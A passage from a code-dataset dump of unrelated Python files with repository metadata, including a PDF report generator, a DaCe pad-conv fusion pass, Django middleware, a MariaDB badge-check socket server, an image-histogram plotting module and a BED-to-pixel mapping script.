pdf.cell(15, th * 1.6, str(weight_9.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 10
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '10. Reagents obtained from renewable sources should be preferred.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_10)
pdf.cell(15, th * 1.6, str(round(var_10, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_10.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 11
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th *1.6, '11. Toxic reagents should be eliminated or replaced.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_11)
pdf.cell(15, th * 1.6, str(round(var_11, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_11.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# Rule 12
top = pdf.y
offset = pdf.x + 120
pdf.cell(120, th * 1.6, '12. Operator\'s safety should be increased.', border=1, fill=True)
# Reset y coordinate
pdf.y = top
# Move to computed offset
pdf.x = offset
fieldColor(var_12)
pdf.cell(15, th * 1.6, str(round(var_12, 2)), border=1, fill=True, align='C')
pdf.set_fill_color(240, 240, 240)
pdf.cell(15, th * 1.6, str(weight_12.get()), border=1, fill=True, align='C')
pdf.ln(th * 2)
# output the pdf:
def savePDF():
ftypes = [('PDF file', '.pdf'), ('All files', '*')]
filename = filedialog.asksaveasfilename(filetypes=ftypes, defaultextension='.pdf')
# save the pdf
pdf.output(filename, 'F')
savePDF()
# add the report functionality to the file menu:
FileMenu.add_command(label='Generate report', command=generateReport)
FileMenu.add_separator()
# add a button to refresh the chart:
refreshButton = ttk.Button(leftFrame, text='RE-GENERATE PLOT', width=20,
command=lambda: [printScore(),
clearFrame(rightFrame),
pieChart(),
print_variables()
])
refreshButton.pack(side=BOTTOM, anchor=SE)
##########################################################################################################
##################################################################################################
root.mainloop() # to keep the window continuously on, otherwise it shall disappear
| Casivelaunus/Green_index | Main_window.py | Main_window.py | py | 62,363 | python | en | code | 0 | github-code | 36 |
6674627865 | import torch
from dace.transformation import transformation
from dace.properties import make_properties
from dace.sdfg.utils import node_path_graph
from dace import nodes, SDFG, SDFGState, registry, Memlet
from typing import Dict, Union
from daceml import onnx as donnx
from daceml.transformation.constant_folding import remove_node_and_computation
from daceml.util import utils
@make_properties
class PadConvFusion(transformation.SingleStateTransformation):
""" Fuse a constant pad into a convolution.
"""
pad = transformation.PatternNode(donnx.ONNXPad)
data = transformation.PatternNode(nodes.AccessNode)
conv = transformation.PatternNode(donnx.ONNXConv)
@classmethod
def expressions(cls):
return [node_path_graph(cls.pad, cls.data, cls.conv)]
def can_be_applied(self,
graph: SDFGState,
expr_index: int,
sdfg: SDFG,
permissive: bool = False) -> bool:
pad: donnx.ONNXPad = self.pad
data_node: nodes.AccessNode = self.data
conv: donnx.ONNXConv = self.conv
if pad.mode != 'constant':
return False
# Check if data in access node is used anywhere else
other_nodes = [
node for state in sdfg.nodes() for node in state.nodes() if
isinstance(node, nodes.AccessNode) and node.data == data_node.data
]
if len(other_nodes) != 1:
return False
# conservative: padded value should be 4 dimensional
if len(data_node.desc(sdfg).shape) != 4:
return False
# no other out edges
if graph.in_degree(data_node) != 1 or graph.out_degree(data_node) != 1:
return False
# check that the two pad inputs can be folded
constant_value = list(
graph.in_edges_by_connector(pad, "constant_value"))[0].data.data
pads = list(graph.in_edges_by_connector(pad, "pads"))[0].data.data
if constant_value not in sdfg._parent_onnx_model.clean_weights:
return False
if pads not in sdfg._parent_onnx_model.clean_weights:
return False
pads_value: torch.Tensor = sdfg._parent_onnx_model.clean_weights[pads]
constant_value_value: torch.Tensor = sdfg._parent_onnx_model.clean_weights[
constant_value]
if constant_value_value != 0:
return False
if len(pads_value.shape) != 1 or pads_value.shape[0] != 8:
return False
# can only eliminate the pad if it is along the spatial axes
# pads_value[i::4] gets the padding at the start and end of the i-th axis
if (not utils.iterables_equal(pads_value[0::4], [0, 0])
and utils.iterables_equal(pads_value[1::4], [0, 0])):
return False
return True
def apply(self, state: SDFGState, sdfg: SDFG):
pad: donnx.ONNXPad = self.pad
data_node: nodes.AccessNode = self.data
conv: donnx.ONNXConv = self.conv
pads = list(state.in_edges_by_connector(pad, "pads"))[0].data.data
pads_value: torch.Tensor = sdfg._parent_onnx_model.clean_weights[pads]
conv.pads[0] += int(pads_value[2::4][0])
conv.pads[2] += int(pads_value[2::4][1])
conv.pads[1] += int(pads_value[3::4][0])
conv.pads[3] += int(pads_value[3::4][1])
in_edge = next(state.in_edges_by_connector(pad, "data"))
state.add_edge(in_edge.src, in_edge.src_conn, conv, "X", in_edge.data)
state.remove_edge(in_edge)
remove_node_and_computation(sdfg, state, data_node)
| spcl/daceml | daceml/transformation/pad_conv_fusion.py | pad_conv_fusion.py | py | 3,630 | python | en | code | 69 | github-code | 36 |
26648319096 | import os
import sys
from glob import glob
from json2mongo import WriteToDataBase
import argparse
import configparser
filename = "last_run_context_numbers.txt"
# argument to be provided to the process manager
parser = argparse.ArgumentParser( description="process manager" )
# need this to read the ini file
config = configparser.ConfigParser()
def read_run_context():
"""
read the file last_run_context_numbers.txt and give back the the run & context numbers
"""
global filename
# read the last_run.txt file and get the last run and the context_version
file_infos = open(filename, "r")
last_run = int(file_infos.readline().strip())
last_context_version = file_infos.readline().strip()
return last_run, last_context_version
def loop_over_main_dir(main_dir=None, database=None):
"""
Loop over the directory $HOME/data/xom and get the main directories
The idea is to compare the context versions then the run numbers
"""
last_run, last_context = read_run_context()
list_contexts = []
for name in os.listdir( main_dir ):
if os.path.isdir( main_dir + name ) and not name.startswith("_"):
list_contexts.append( name )
print('number of contexts we have: ', list_contexts)
if len(list_contexts) > 1:
for newcontext in list_contexts:
# we are going to loop over the 'new context' and write what is inside it to the DB
# this comparison ensures that the old context was already written in DB
if newcontext > last_context :
# we go to the new directory that is made from the new context
# we get the list of directories(runs) inside this new context
current_dir = main_dir + newcontext
os.chdir( current_dir )
# we get all the runs in the new context as a list from glob
list_runs = glob('[0-9]*')
print('list of runs:', list_runs)
if len(list_runs):
for runs in list_runs:
current_dir = main_dir + newcontext + "/" + runs
#lets go inside
os.chdir(current_dir)
# we need the run number inside this new context, of course there is only one
jsonfilename = glob("*.json")[0]
run_number = int(runs)
dbwriter = WriteToDataBase(datapath=current_dir, database=database,
collection=newcontext, runnumber=run_number,
jsonfile=jsonfilename)
try:
print( 'Writing the modified json file to the DB' )
# now lets write the json file inside the data base
dbwriter.write_to_db()
except Exception as err:
print("we can't write the json file to the data base")
print("the error: ", err)
elif len(list_contexts) == 1:
if list_contexts[0] == last_context:
# we are still under the same versions of the context
# we get into the directory of that context version and loop over directories
old_context_directory = main_dir + last_context
# each directory has a name which is the run number
list_run_directories = []
for name in os.listdir( old_context_directory ):
if os.path.isdir( old_context_directory + "/" + name ):
list_run_directories.append( int( name ) )
print('the list of runs: ', list_run_directories)
# now get the run_numbers and compare them to the old one
for newrun in list_run_directories:
if newrun - last_run == 0:
# there are no changes in the run numbers just quit here.
break
# compare each run_directory with the old one:
elif newrun - last_run >=1 :
current_dir = old_context_directory + "/" + str(newrun)
# lets go inside
os.chdir( current_dir )
# we need the run number inside this new context, of course there is only one
jsonfilename = glob( "*.json" )[0]
run_number = int( jsonfilename.rstrip( ".json" ) )
dbwriter = WriteToDataBase( datapath=current_dir, database=database,
collection=last_context, runnumber=run_number,
jsonfile=jsonfilename )
try:
print( 'Writing the modified json file to the DB' )
# now lets write the json file inside the data base
dbwriter.write_to_db()
except Exception as err:
print( "Can not dump the json file to DB" )
print( "the error: ", err )
else:
sys.exit( "old_context and new context are different BUT they should not be!!!" )
else:
sys.exit("something is wrong with the module:%s" %"write_json_to_db.py")
def main():
"""
here we set all the arguments and make call for the function:loop_over_main_dir
:return: nothing
"""
config.read( "pm.ini" )
parser.add_argument( '--mainDir',
default=config["LNGS"]["maindirectory"],
type=str,
help='Name of the main directory at LNGS for data' )
parser.add_argument( '--DBLngs',
default=config["LNGS"]["db_lngs"],
type=str,
help='Name of the data base at LNGS' )
# Get the object of arguments, args
args = parser.parse_args()
print("module: write_json_to_db.py")
print("given arguments to loop_over_main_dir")
print("main dir: ", args.mainDir)
print("data base name: ", args.DBLngs)
# call loop_over_main_dir with two args
loop_over_main_dir(main_dir=args.mainDir, database=args.DBLngs)
if __name__ == "__main__" :
# now copy the json file into the database
main() | ShanJ35/XOM_master | backend/write_json_to_db.py | write_json_to_db.py | py | 6,424 | python | en | code | 0 | github-code | 36 |
16126384094 | import pandas as pd
import glob
path = r'/Users/gonzalovaldenebro/Library/CloudStorage/OneDrive-DrakeUniversity/STAT 190/Project 1/Data/Fault_Codes_Time_Series/merged_csv.csv'
all_files = glob.glob(path + "/*.csv")
column_names = ['Turbine', 'Time', 'Date', 'error_id', 'status_code', 'error_message', 'error_category']
list = []
for filename in all_files:
df = pd.read_csv(filename, header=None, names=column_names)
list.append(df)
frame = pd.concat(list, axis=0, ignore_index=True)
frame.to_csv('merged_csv.csv', index=False)
| meetkpatel20/Stat-190-Project-1 | csv_merger/setColumn_names.py | setColumn_names.py | py | 545 | python | en | code | 1 | github-code | 36 |
39804054613 |
import os
from django.urls import resolve, reverse
from django.shortcuts import redirect
from django.http import HttpResponseForbidden
from internal_users.models import InternalUser
from firebase_auth_app.models import FirebaseUser
from customer_users.models import CustomerUser
class InternalUserMiddleware:
# Define apps that need to pass through the middleware check
PROTECTED_APPS = ['talents', 'apis',
'dashboard', 'admin', 'talent_management',] # 'appointments'
# login_url = reverse('internal_users:internal_user_login')
def __init__(self, get_response):
self.get_response = get_response
self.employee_login_url = reverse('internal_users:internal_user_login')
self.customer_login_url = reverse('customer_users:customer_user_login')
def __call__(self, request):
# Resolve the current app name
current_app = resolve(request.path_info).app_name
print(
F'The current_app name is {current_app}. url requeted is {request.path}. is_authenticated?:{request.user.is_authenticated}.')
# print(request.path, request.user.is_authenticated)
# If the user is trying to access the login page itself, bypass further checks
if request.path == self.employee_login_url or request.path == self.customer_login_url:
return self.get_response(request)
# Check if the request path resolves to any of the protected apps
if current_app in self.PROTECTED_APPS:
print(
f'url visit to protected app(s). Implementing custom rules in InternalUserMiddleware...')
if not request.user.is_authenticated or (request.user.is_authenticated and not isinstance(request.user, InternalUser)):
print('incorrect redirecting to the employee login url...')
return redirect(self.employee_login_url)
# # Additional check for CustomerUser when visiting the customer_users app
# if current_app in ['customer_users'] and (not request.user.is_authenticated or (request.user.is_authenticated and not isinstance(request.user, CustomerUser))):
# # Redirect to the customer user login
# print('redirecting to the customer login url...')
# return redirect(self.customer_login_url)
return self.get_response(request)
# the future used multiple user model authentication middleware; designed used with firebase auth
class MultipleUserModelMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
if 'uid' in request.session:
uid = request.session['uid']
firebase_user = None
specific_user = None
try:
firebase_user = FirebaseUser.objects.get(uid=uid)
except FirebaseUser.DoesNotExist:
pass
if firebase_user:
# Set base user
request.firebase_user = firebase_user
# Check each model to find the specific user
for user_model in [CustomerUser, InternalUser]:
try:
specific_user = user_model.objects.get(
firebase_user=firebase_user)
break
except user_model.DoesNotExist:
continue
if specific_user:
request.user = specific_user
response = self.get_response(request)
return response
| zjgcainiao/new_place_at_76 | internal_users/middlewares.py | middlewares.py | py | 3,585 | python | en | code | 0 | github-code | 36 |
37000757290 | T = int(input())
for tc in range(1, T+1):
N = int(input()) # 1 4 7 8 0
number_list = list(map(int, input().split()))
count_list = [0] * (max(number_list)+1) #최댓값보다 1개 큰 값
sort_list = [0] * len(number_list)
for num in number_list:
count_list[num] += 1
#count_list = [1, 1, 0, 0, 1, 0, 0, 1, 1]
for i in range(1, len(count_list)):
count_list[i] = count_list[i] + count_list[i-1]
#count_list = [1, 2, 2, 2, 3, 3, 3, 4, 5]
for i in range(len(sort_list)-1, -1, -1):
count_list[number_list[i]] -= 1 #인덱스값 맞춰주기 위해
#number_list 내에 있는 값만 호출 됨
sort_list[count_list[number_list[i]]] = number_list[i]
#sort_list 내 알맞는 위치에 해당 number값 넣기
# [0, 2, 2, 2, 3, 3, 3, 4, 5]
# [0, 0, 0, 0, 0]
# [0, 2, 2, 2, 3, 3, 3, 4, 4]
# [0, 0, 0, 0, 8]
# [0, 2, 2, 2, 3, 3, 3, 3, 4]
# [0, 0, 0, 7, 8]
# [0, 2, 2, 2, 2, 3, 3, 3, 4]
# [0, 0, 4, 7, 8]
# [0, 1, 2, 2, 2, 3, 3, 3, 4]
# [0, 1, 4, 7, 8]
print(f'#{tc}', end=' ')
for num in sort_list:
print(num, end=' ')
print('')
| ejuun/SWEA | swea0202_1966.py | swea0202_1966.py | py | 1,216 | python | en | code | 0 | github-code | 36 |
37716628062 | # Module Imports
import mariadb
import sys
import socket
import threading
import time
# Connect to MariaDB Platform
try:
db = mariadb.connect(
user="user",
password="password",
host="mariadb",
port=3306,
database="info801"
)
except mariadb.Error as e:
print(f"Error connecting to MariaDB Platform: {e}")
sys.exit(1)
# Get Cursor
cur = db.cursor()
HEADER = 64
SERVER = socket.gethostbyname(socket.gethostname())
PORT = 5050
ADDR = (SERVER,PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
def getBatimentByName(bat):
cur.execute(
"SELECT id FROM batiment WHERE nom=? LIMIT 1",
(bat,))
def getPersonneByBadge(badge):
cur.execute(
"SELECT id FROM personne WHERE numero_badge=? LIMIT 1",
(badge,))
def verify(idBat,idPer):
cur.execute(
"SELECT COUNT(*) FROM personne_batiment WHERE batiment_id=? AND personne_id=?",
(idBat,idPer))
def insertHistory(personne_id,batiment_id):
cur.execute(
"INSERT INTO history (personne_id,batiment_id) VALUES (?, ?)",
(personne_id, batiment_id))
db.commit()
print(f"Last Inserted ID: {cur.lastrowid}")
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
msg = msg.split(',')
print(msg)
if msg == DISCONNECT_MESSAGE:
connected = False
if(msg[0] == "batiment"):
msg.pop(0)
getBatimentByName(msg[0])
msg.pop(0)
(idBat,) = cur.fetchone()
print(f"id bat: {idBat}")
#remove scanCarte
msg.pop(0)
getPersonneByBadge(msg[0])
(idPer,) = cur.fetchone()
print(f"id bat: {idPer}")
msg.pop(0)
cur.fetchall()
verify(idBat,idPer)
(ver,) = cur.fetchone()
if ver==0:
msg = "status,lumiereRouge"
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
conn.send(send_length)
conn.send(message)
insertHistory(idPer,idBat)
else:
msg = "status,lumiereVerte"
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
conn.send(send_length)
conn.send(message)
insertHistory(idPer,idBat)
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start() | visarsylejmani/architecture-logicielle-info801 | server/server.py | server.py | py | 3,523 | python | en | code | 0 | github-code | 36 |
5668667396 | from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from matplotlib.offsetbox import OffsetImage, AnnotationBbox
from PIL import Image as pil_image
from mosaic import data_utils
from mosaic import contexts
from mosaic import image_io
from mosaic import features
from mosaic import plots
__all__ = ['image_histogram']
def images_to_histogram(images, x, n_bins=None, sort_by=None):
"""Create an image histogram.
Parameters
----------
images : listof PIL Images.
Images to display in the image histogram. All images must be
the same shape.
x : np.array of shape [n_samples,]
The variable whose histogram is displayed.
n_bins : int or None, optional
Specification of the number of bins. If None, then the
Freedman-Diaconis estimator is used to determine the number of bins.
sort_by : np.array of shape [n_samples,], optional
Data or name of the variable to sort images by on the y-axis.
Returns
-------
A properly shaped width x height x 3 PIL Image.
"""
n_bins = n_bins if n_bins is not None else 'fd'
hist, bin_edges = np.histogram(x, bins=n_bins)
n_bins = hist.shape[0]
bin_max = hist.max()
width, height = images[0].size
px_w = width * n_bins
px_h = height * bin_max
#background_color = (50, 50, 50)
background_color = (255, 255, 255)
canvas = pil_image.new('RGB', (px_w, px_h), background_color)
thumbnail_px = (width, height)
for bin_idx, edge in enumerate(zip(bin_edges, bin_edges[1:])):
edge_mask = (x >= edge[0]) & (x < edge[1])
tmp_sort = sort_by[edge_mask]
tmp = [images[index] for index in np.where(edge_mask)[0]]
# sort y values if present
if sort_by is not None:
tmp = [tmp[index] for index in np.argsort(tmp_sort)[::-1]]
y_coord = px_h
x_coord = width * bin_idx
for thumbnail in tmp:
canvas.paste(thumbnail, (x_coord, y_coord))
y_coord -= height
return canvas
def histogram_matplotlib(images, x, n_bins=None, sort_by=None, **kwargs):
fig, ax = plt.subplots(**kwargs)
n_bins = n_bins if n_bins is not None else 'fd'
hist, bin_edges = np.histogram(x, bins=n_bins)
n_bins = hist.shape[0]
bin_max = hist.max()
y_max = 0
for bin_idx, edge in enumerate(zip(bin_edges, bin_edges[1:])):
img_height = abs(edge[1] - edge[0])
edge_mask = (x >= edge[0]) & (x < edge[1])
bin_images = images[edge_mask]
# sort y values if present
if sort_by is not None:
bin_sort = sort_by[edge_mask]
bin_images = bin_images[np.argsort(bin_sort)]
left, right = edge
for i, img in enumerate(bin_images):
bottom = img_height * i
top = bottom + img_height
plots.imshow(img, extent=[left, right, bottom, top], interpolation='lanczos')
if top > y_max:
y_max = top
ax.set_xlim(bin_edges[0], bin_edges[-1])
ax.set_ylim(0, y_max)
ax.yaxis.set_visible(False)
return sns.despine(ax=ax, left=True)
def image_histogram(x,
images=None,
data=None,
n_bins=None,
sort_by=features.HSVFeatures.SATURATION,
image_dir='',
image_size=None,
n_jobs=1,
**kwargs):
"""Create an univariate image histogram binned by the `x`
variable.
Parameters
----------
x : str or array-like of shape [n_samples,]
Data or names of variables in `data`.
images : str or array-like of shape [n_samples, width, height, channels], optional
Image array or name of the variable containing the image file
paths within `data`.
data : pandas.DataFrame, optional
Tidy ("long-form") dataframe where each column is a variable
and each row is an observation. If `images`, `x`, or `sort_by`
is a variable name, then it should be contained in `data`.
n_bins : int or None
Specification of the number of bins. If None, then the
Freedman-Diaconis estimator is used to determine the number of bins.
sort_by : str, HSVFeatures enum or array-like of shape [n_samples,], optional
Data or name of the variable to sort images by on the y-axis.
image_dir : str (default='')
The location of the image files on disk.
image_size : int
The size of each image in the scatter plot.
n_jobs : int (default=1)
The number of parallel workers to use for loading
the image files.
Returns
-------
ax : matplotlib Axes
Returns the Axes object with the plot for further tweaking.
Examples
--------
Create an image histogram.
.. plot:: ../examples/image_histogram.py
"""
images = data_utils.get_images(
data, images,
image_dir=image_dir,
image_size=image_size,
index=None,#x.index,
as_image=False,
n_jobs=n_jobs)
x = data_utils.get_variable(data, x)
if sort_by is not None:
if sort_by in features.HSVFeatures.all_features():
hsv = features.extract_hsv_stats(images, n_jobs=n_jobs)
sort_by = hsv[:, features.HSVFeatures.feature_index(sort_by)]
else:
sort_by = data_utils.get_variable(data, sort_by)
#histo = images_to_histogram(images, x, n_bins=n_bins, sort_by=sort_by)
#return plots.pillow_to_matplotlib(histo, **kwargs)
return histogram_matplotlib(images, x, n_bins=n_bins, sort_by=sort_by, **kwargs)
| joshloyal/Mosaic | mosaic/histogram.py | histogram.py | py | 5,809 | python | en | code | 0 | github-code | 36 |
74797071465 | import scrapy
from scrapy.spiders import CrawlSpider, Rule
from scrapy.http import Request
import re
class MySpider(CrawlSpider):
name = 'author_scrape'
author_name = 'الكندي يعقوب'
author_eng = 'al-Kindi'
start_urls = ['https://ablibrary.net/books/?offset=0&limit=50&author={}&sort=name,asc'.format(author_name)]#start url from here, need to parse the json dict.
def parse(self, response):
author_data = response.body.decode()
books_ptrn = re.compile(r'"(author":.+?id":(\d+?),.+?"name":" (.+?)".+?"volume":"(.+?)"})',
re.DOTALL | re.MULTILINE | re.UNICODE)
books = re.findall(books_ptrn, author_data)
for book in books:
bib = book[0]
book_id = book[1]
title = book[2]
all_text = ''
bib_data = {'author': self.author_eng, 'title': title, 'bib data': bib, 'all_text': all_text}
volume = book[3]
if volume != ' ':
bib_data['title'] = bib_data['title']+'v.' + volume
book_url = 'https://ablibrary.net/books/{}/content?fields=content,footnote,description,page_name,' \
'page_number'.format(book_id)
request = Request(book_url, callback=self.parse_book)
request.meta['meta'] = bib_data
yield request
def parse_book(self, response):
bib_data = response.meta['meta']
book_text = response.body.decode()
bib_data['all_text'] = bib_data['all_text'] + '\n' + book_text
self.log('extracted book {}'.format(bib_data['title']))
text_file = open("{}, {}.txt".format(bib_data['title'], self.author_eng), "w", encoding='utf-8')
#bib_data['all_text'] = self.clean_text(bib_data['all_text'])
text_file.write(bib_data['all_text'])
text_file.close()
def clean_text(self, text):
#here will be code that removes from the string "text" the unwanted patterns
return text
| maeirnoam/scrapers | ABLibrary/ablib_scraper/ablib_scraper/spiders/ABLibCrawler.py | ABLibCrawler.py | py | 2,051 | python | en | code | 0 | github-code | 36 |
71798506343 | #!/usr/bin/python
# python images_for_deep_learning_sv02_create_non_white_space_mapping_file.py -i input_bed -o output_mapping_file
# python images_for_deep_learning_sv02_create_non_white_space_mapping_file.py -i non_white_out_all_mgrb_and_isks.txt -o non_white_out_all_mgrb_and_isks_map_350x350.txt
# Sort input bed file by chromosome. It is assumed that positions within chromosome are already sorted.
# Count number of nucleotides in it.
# Map nucleotide positions to a 350 x 350 array.
# Output the mapping.
# This mapping will be used to convert a VCF file to a 350 x 350 image.
# The entire 3 billion nucleotide genome could have been mapped. However, most of it doesn't contain any variants.
# This program reads and maps only those genome positions that have variants.
# Even then, there will be more genomic nucleotides to map to pixels than there are available pixels in a 350 x 350 image.
# This program calculates the nucleotide_to_pixel_ratio and maps or compresses multiple bp into one pixel.
# Mapping file is tab-delimited and has no header. First line is nucleotide_to_pixel_ratio, num_rows, and num_cols for pixel image.
# Columns are chrom, start_pos, end_pos, map_row_start, map_col_start, map_row_end, map_col_end
# 14214 350 350
# 1 843216 843248 1 1 1 1
# 1 869460 870342 1 1 1 1
# 1 884041 884110 1 1 1 1
# ...
# Y 22661495 22661520 350 52 350 52
# Y 24417006 24417026 350 52 350 52
# Y 28787561 28802853 350 52 350 53
# MT 1 16569 350 53 350 54
__author__ = 'Emma M. Rath'
__copyright__ = 'Copyright 2019, Garvan Institute of Medical Research and Kinghorn Cancer Centre'
import sys
import os
import argparse
import math
######################################################
def is_integer(s):
try:
int(s)
return True
except ValueError:
return False
######################################################
def read_input( in_bed ):
in_chrom = []
in_start = []
in_end = []
infile = open( in_bed, 'r')
for inline in infile:
inline = inline.strip()
if (inline != ''):
infields = inline.split('\t')
in_chrom.append( str(infields[0]) )
in_start.append( int(infields[1]) )
in_end.append( int(infields[2]) )
return in_chrom, in_start, in_end
######################################################
def sort_input( in1_chrom, in1_start, in1_end ):
order_of_chromosomes = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','X','Y','MT']
in2_chrom = []
in2_start = []
in2_end = []
for this_chrom in order_of_chromosomes:
for i in range( 0, len(in1_chrom) ):
if (in1_chrom[i] == this_chrom):
in2_chrom.append( in1_chrom[i] )
in2_start.append( in1_start[i] )
in2_end.append( in1_end[i] )
return in2_chrom, in2_start, in2_end
######################################################
def count_nucleotides( in_start, in_end ):
    """Return the total number of base pairs covered by the intervals.

    Both interval ends are inclusive, so each interval contributes
    end - start + 1 nucleotides.
    """
    return sum(end - start + 1 for start, end in zip(in_start, in_end))
######################################################
def map_positions_to_pixels( in_chrom, in_start, in_end, num_rows, num_cols, nucleotide_to_pixel_ratio ):
    """Assign each genomic interval a start and end pixel in row-major order.

    Pixel coordinates are 1-based (row, col) positions in a
    num_rows x num_cols image.  Intervals are laid out consecutively: each
    occupies ceil(interval_bp / nucleotide_to_pixel_ratio) pixels starting
    at the current cursor, wrapping onto following rows as needed.

    Returns four parallel lists: start row, start col, end row, end col.
    """
    map_row_start = [0] * len(in_chrom)
    map_col_start = [0] * len(in_chrom)
    map_row_end = [0] * len(in_chrom)
    map_col_end = [0] * len(in_chrom)
    # Cursor: the pixel where the next interval starts (1-based).
    row_upto = 1
    col_upto = 1
    for i in range( 0, len(in_chrom)):
        chrom = str(in_chrom[i])  # NOTE(review): assigned but never used below
        start_pos = int(in_start[i])
        end_pos = int(in_end[i])
        map_row_start[i] = row_upto
        map_col_start[i] = col_upto
        remaining_unmapped_bp = end_pos - start_pos + 1
        # Pixels needed = ceiling of bp / ratio (truncate, then +1 on remainder).
        remaining_unmapped_pixels = int(remaining_unmapped_bp / nucleotide_to_pixel_ratio)
        if (int(remaining_unmapped_bp % nucleotide_to_pixel_ratio) > 0):
            remaining_unmapped_pixels = remaining_unmapped_pixels + 1
        # NOTE(review): the '- 1' leaves one column of slack per row; if the
        # final column were meant to be usable this would be
        # num_cols - col_upto + 1 -- confirm against expected mapping output.
        remaining_cols_in_row = num_cols - col_upto - 1
        if (remaining_unmapped_pixels <= remaining_cols_in_row):
            # Interval fits on the current row.
            map_row_end[i] = row_upto
            map_col_end[i] = col_upto + remaining_unmapped_pixels - 1
            col_upto = col_upto + remaining_unmapped_pixels - 1
        else:
            # Interval spills onto one or more following rows.
            remaining_unmapped_pixels = remaining_unmapped_pixels - remaining_cols_in_row
            additional_rows = int(math.ceil( float(remaining_unmapped_pixels) / float(num_cols) ))
            map_row_end[i] = row_upto + additional_rows
            row_upto = row_upto + additional_rows
            additional_cols = int(remaining_unmapped_pixels % num_cols)
            if (additional_cols == 0):
                # Interval ends exactly at the last column of its final row.
                col_upto = num_cols
                map_col_end[i] = num_cols
            else:
                col_upto = additional_cols
                map_col_end[i] = additional_cols
    return map_row_start, map_col_start, map_row_end, map_col_end
######################################################
def write_output_map( out_map, nucleotide_to_pixel_ratio, num_rows, num_cols, in_chrom, in_start, in_end, map_row_start, map_col_start, map_row_end, map_col_end ):
    """Write the tab-delimited mapping file described in the module header.

    The first line holds nucleotide_to_pixel_ratio, num_rows and num_cols;
    each following line holds chrom, start_pos, end_pos and the start/end
    pixel coordinates of one interval.
    """
    # 'with' guarantees the handle is closed (and data flushed) even if a
    # write fails part-way through; the original closed it only on success.
    with open(out_map, 'w') as out_map_file:
        outline = str(nucleotide_to_pixel_ratio) + "\t" + str(num_rows) + "\t" + str(num_cols) + "\n"
        out_map_file.write( outline )
        for i in range( 0, len(in_chrom) ):
            outline = str(in_chrom[i]) + "\t" + str(in_start[i]) + "\t" + str(in_end[i]) + "\t" + str(map_row_start[i]) + "\t" + str(map_col_start[i]) + "\t" + str(map_row_end[i]) + "\t" + str(map_col_end[i]) + "\n"
            out_map_file.write( outline )
    return
######################################################
def main():
    """Command-line entry point: read a BED file, sort it into canonical
    chromosome order, and write the genome-position-to-pixel mapping file."""
    arg_parser = argparse.ArgumentParser(description='Read in BED file and sort. Map BED file locations to a 350 x 350 array.')
    arg_parser.add_argument('-i', action="store", dest="in_bed", required=True, help='Input BED file')
    arg_parser.add_argument('-o', action="store", dest="out_map", required=True, help='Output mapping file')
    args = arg_parser.parse_args()
    image_rows = 350
    image_cols = 350
    raw_chrom, raw_start, raw_end = read_input(args.in_bed)
    bed_chrom, bed_start, bed_end = sort_input(raw_chrom, raw_start, raw_end)
    total_bp = count_nucleotides(bed_start, bed_end)
    total_pixels = image_rows * image_cols
    # Keep the original rounding behaviour exactly: truncate the float
    # ratio, then add one.
    bp_per_pixel = int(total_bp / total_pixels) + 1
    row_start, col_start, row_end, col_end = map_positions_to_pixels(bed_chrom, bed_start, bed_end, image_rows, image_cols, bp_per_pixel)
    write_output_map(args.out_map, bp_per_pixel, image_rows, image_cols, bed_chrom, bed_start, bed_end, row_start, col_start, row_end, col_end)
if __name__=='__main__':
    main()
| emmamrath/gene_annotation_of_structural_variants | create_images_for_deep_learning/images_for_deep_learning_sv02_create_non_white_space_mapping_file.py | images_for_deep_learning_sv02_create_non_white_space_mapping_file.py | py | 6,428 | python | en | code | 1 | github-code | 36 |
26736973424 | import json
import re
from PyQt5.QtGui import QColor
from PyQt5.QtWidgets import QFileDialog, QListWidgetItem, QColorDialog
from models.const import *
from models import util
from uis.main_window import Ui_MainWindow
class SettingsController(object):
    """Controller for the settings tab: populates the Qt widgets from the
    persisted configuration (``MY_CONFIG``) and writes edited values back.

    NOTE(review): several names used below (``TRSM``, ``MY_CONFIG``,
    ``WEB_BOT``, ``EXECUTOR``, ``QtCore``, ``concurrent``) are not imported
    in this file; presumably they are re-exported by
    ``from models.const import *`` -- verify.
    """
    def __init__(self, app=None, ui: Ui_MainWindow = None, main_controller=None):
        """Keep references to the app, generated UI and main window, then wire the tab."""
        self.app = app
        self.ui = ui
        self.main_controller = main_controller
        self.setup_control()
        pass
    def setup_control(self):
        """Populate combo boxes, load the saved config and connect widget signals."""
        self.ui.cbx_settings_reader_auto_play_pgb.addItems([TRSM("No"),TRSM("Yes")])
        self.ui.cbx_settings_proxy_mode.addItems([TRSM("Disable proxy"),TRSM("Use proxy and not proxy same time"),TRSM("Only use proxy")])
        self.ui.cbx_settings_proxy_type.addItems([TRSM("https"),TRSM("http")])
